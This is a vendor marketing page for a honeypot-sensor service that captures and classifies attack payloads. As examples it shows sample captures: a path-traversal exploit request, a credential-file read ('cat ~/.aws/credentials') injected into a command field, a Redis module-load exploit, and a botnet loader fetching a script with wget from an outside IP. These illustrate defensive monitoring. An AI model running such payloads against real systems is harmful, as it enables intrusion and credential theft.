Let attackers hit a decoy first.
Attack Intelligence runs Siren honeypot sensors: systems that look like real services and record everything sent to them. Some sit on our global network, and you can install your own at the edge of your network or inside it. Each capture is classified by what its payload does, and Rover, our ML model, flags the requests that stand out from the usual noise.
- GlobalExploit attempt, CVE-2025-0108High
GET /unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css - GlobalCredential-file grabHigh
POST /admin/config cmd=cat ~/.aws/credentials - DMZRedis exploitationCritical
MODULE LOAD /tmp/exp.so - DMZBotnet loader / C2Critical
telnet root:admin → wget http://198.51.100.7/cat.sh - PrivateInternal host touched a sensorCritical
GET /admin/config
Real attacks, with the payload attached.
Most intelligence describes an attack after someone else has seen it. A sensor records the attack itself: the request, the payload, where it came from and what it was trying to do.
On the internet, our global sensors get the same scanning and exploitation that every exposed service gets. That shows which vulnerabilities attackers are trying right now and what they try to drop once they're in.
Inside your network the logic is simpler. Nothing legitimate should be talking to a sensor, so anything that does is worth checking.
Sensors where you need them.
Use our global network on its own, or add sensors of your own alongside it.
Global network
Our sensors run across the internet and record the scanning and exploitation that every exposed service receives. You see which exploits and botnet payloads are in circulation without installing anything.
Edge (DMZ)
Install a sensor next to your public-facing systems. It shows who is probing your perimeter and what they send.
Private network
Install a sensor inside your network. It has no real users, so any device or account that touches it is behaving in a way worth checking.
Every capture is kept whole.
The full payload
Sensors keep the complete request and payload, not a summary, so you can see exactly what was sent.
Classified by behavior
Each request is classified by what its payload does, for example a botnet loader or a grab for credential files. A User-Agent or any other header an attacker can fake doesn't change the verdict.
Indicators pulled out
C2 endpoints and download URLs are extracted from the payload and kept as evidence.
ML on the noise
Most traffic to a sensor is routine scanning. Rover, our ML model, flags the requests that deviate from that background, so the unusual ones don't get lost.
From a request on a sensor to an answer.
- 1
Deploy
Start with the global network, then add sensors at your edge or inside your network if you want them.
- 2
Capture
Sensors record every request sent to them, with the full payload.
- 3
Classify
Each capture is classified by behavior, and Rover flags whatever stands out.
- 4
Investigate
Review your sensor activity in Cypho, or ask the AI Assistant about it.
Things people ask about Attack Intelligence.
What is a honeypot sensor?
A system that looks like a real service, such as an admin panel or a database, but has no real users. Whatever is sent to it is recorded and analyzed.
Do we have to install anything?
No. The global sensor network works without anything on your side. Sensors at your edge or inside your network are optional, and run in the network you install them in.
How is this different from Threat Intelligence?
Threat Intelligence collects what others publish and discuss: forums, leaks, feeds and CVEs. Attack Intelligence comes from our own sensors, so you see attacks as they are sent, with the full payload.
Where do your research posts come from?
Many come from these sensors. When a capture is interesting, our research team takes it apart and publishes what it finds.
Unknown threats are unstoppable. Until we expose them.
Send us your company domain. We'll walk you through what's already out there about you and how Cypho would handle it, with one of our analysts on the call.
Or write to [email protected]